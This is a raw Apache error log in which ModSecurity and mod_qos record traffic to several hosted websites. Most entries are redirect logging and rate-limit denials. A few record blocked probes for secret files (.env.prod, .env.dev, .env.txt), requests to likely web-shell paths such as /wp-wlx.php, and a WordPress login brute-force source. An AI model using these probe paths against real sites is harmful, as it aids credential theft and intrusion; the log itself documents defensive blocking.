[Tue May 26 20:00:21.347233 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBBQAAABE"]
[Tue May 26 20:00:21.352211 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dNgAAAOQ"]
[Tue May 26 20:00:21.354636 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAswAAAB4"]
[Tue May 26 20:00:21.362764 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAuQAAAAs"]
[Tue May 26 20:00:21.364674 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswA9gAAAAE"]
[Tue May 26 20:00:21.369470 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAsgAAAEo"]
[Tue May 26 20:00:21.373265 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBBAAAAGc"]
[Tue May 26 20:00:21.376238 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dhQAAAJY"]
[Tue May 26 20:00:21.378861 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1degAAAJ0"]
[Tue May 26 20:00:21.380435 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswA_gAAABQ"]
[Tue May 26 20:00:21.381189 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dUgAAANc"]
[Tue May 26 20:00:21.383051 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswA-AAAACo"]
[Tue May 26 20:00:21.392170 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAugAAABU"]
[Tue May 26 20:00:21.393403 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAvAAAAEs"]
[Tue May 26 20:00:21.395758 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBBgAAAHo"]
[Tue May 26 20:00:21.398011 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswArgAAAFs"]
[Tue May 26 20:00:21.404858 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBDQAAAHw"]
[Tue May 26 20:00:21.425579 2026] [security2:error] [pid 106517:tid 106764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1diQAAAPY"]
[Tue May 26 20:00:21.431859 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1digAAALI"]
[Tue May 26 20:00:21.432800 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1diwAAAQI"]
[Tue May 26 20:00:21.506713 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBhQAAcQQ"]
[Tue May 26 20:00:21.648311 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufYZZc2DoU1lPnP1eFQAAANc
[Tue May 26 20:00:21.648331 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWufWDRMqfxdEDkoswBoAAAAB0
[Tue May 26 20:00:21.648358 2026] [qos:error] [pid 106517:tid 106702] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=50.87.254.159, id=ahWufYZZc2DoU1lPnP1eFgAAALg
[Tue May 26 20:00:21.648497 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufWDRMqfxdEDkoswBoQAAABQ
[Tue May 26 20:00:21.677339 2026] [security2:error] [pid 93576:tid 93810] [client 103.163.220.46:58387] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/images/admin.php"] [unique_id "ahWufWDRMqfxdEDkoswBpAAAAGI"]
[Tue May 26 20:00:21.716740 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBowAAbmA"], referer: https://www.ndequipments.com/.env.txt
[Tue May 26 20:00:21.770491 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBqAAAAAk
[Tue May 26 20:00:21.773985 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBqQAAAE0
[Tue May 26 20:00:21.774177 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBqgAAAEU
[Tue May 26 20:00:21.779425 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufWDRMqfxdEDkoswBrAAAAHo
[Tue May 26 20:00:21.782990 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufYZZc2DoU1lPnP1eHgAAAOo
[Tue May 26 20:00:21.801678 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBsgAAAHU
[Tue May 26 20:00:21.802823 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufWDRMqfxdEDkoswBswAAAHU
[Tue May 26 20:00:21.804083 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:46692] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1eHwAAAI0
[Tue May 26 20:00:21.805108 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1eIAAAAI0
[Tue May 26 20:00:21.904992 2026] [qos:error] [pid 106517:tid 106767] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWufYZZc2DoU1lPnP1eJQAAAPk
[Tue May 26 20:00:21.911879 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1eIwAA_BQ"]
[Tue May 26 20:00:22.077084 2026] [security2:error] [pid 106517:tid 106541] [remote 141.138.139.98:49040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWufYZZc2DoU1lPnP1eJAAArRU"]
[Tue May 26 20:00:22.121644 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eLAAAnQo"], referer: https://www.ndequipments.com/.env.prod
[Tue May 26 20:00:22.167161 2026] [security2:error] [pid 93576:tid 93815] [client 103.163.220.11:57473] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-wlx.php"] [unique_id "ahWufmDRMqfxdEDkoswBvwAAAGc"]
[Tue May 26 20:00:22.277840 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dmQAAAQA"]
[Tue May 26 20:00:22.278870 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1djAAAANI"]
[Tue May 26 20:00:22.284301 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBJAAAAFg"]
[Tue May 26 20:00:22.287583 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dmgAAAI4"]
[Tue May 26 20:00:22.290008 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dnAAAAPs"]
[Tue May 26 20:00:22.293208 2026] [security2:error] [pid 106517:tid 106672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dmAAAAJs"]
[Tue May 26 20:00:22.293686 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBIwAAACE"]
[Tue May 26 20:00:22.295477 2026] [security2:error] [pid 106517:tid 106755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dnwAAAO0"]
[Tue May 26 20:00:22.316068 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBMQAAAEQ"]
[Tue May 26 20:00:22.318671 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dngAAAPQ"]
[Tue May 26 20:00:22.319071 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBMgAAAAY"]
[Tue May 26 20:00:22.319071 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dtQAAAMw"]
[Tue May 26 20:00:22.326410 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1drAAAALU"]
[Tue May 26 20:00:22.342506 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBJQAAACg"]
[Tue May 26 20:00:22.343667 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1doAAAAOY"]
[Tue May 26 20:00:22.343732 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dswAAALY"]
[Tue May 26 20:00:22.365709 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufGDRMqfxdEDkoswBPAAAAFA"]
[Tue May 26 20:00:22.372159 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d2gAAAMk"]
[Tue May 26 20:00:22.378973 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1doQAAAIU"]
[Tue May 26 20:00:22.380320 2026] [security2:error] [pid 106517:tid 106654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d4QAAAIk"]
[Tue May 26 20:00:22.383872 2026] [security2:error] [pid 106517:tid 106664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1drQAAAJM"]
[Tue May 26 20:00:22.389490 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1dtAAAAN4"]
[Tue May 26 20:00:22.389785 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBdQAAAGk"]
[Tue May 26 20:00:22.396862 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBewAAAAI"]
[Tue May 26 20:00:22.400915 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBgAAAAC4"]
[Tue May 26 20:00:22.410157 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufIZZc2DoU1lPnP1duwAAANE"]
[Tue May 26 20:00:22.411266 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d2wAAAN0"]
[Tue May 26 20:00:22.418376 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBcQAAAE4"]
[Tue May 26 20:00:22.419838 2026] [security2:error] [pid 106517:tid 106763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d5QAAAPU"]
[Tue May 26 20:00:22.426401 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d5AAAAOg"]
[Tue May 26 20:00:22.433052 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d9QAAAMY"]
[Tue May 26 20:00:22.434109 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d3gAAAPI"]
[Tue May 26 20:00:22.436794 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d7gAAAPg"]
[Tue May 26 20:00:22.437047 2026] [security2:error] [pid 93576:tid 93799] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBjQAAAFc"]
[Tue May 26 20:00:22.438367 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d-AAAAKk"]
[Tue May 26 20:00:22.570506 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswBxwAACS0"], referer: https://www.ndequipments.com/.env.dev
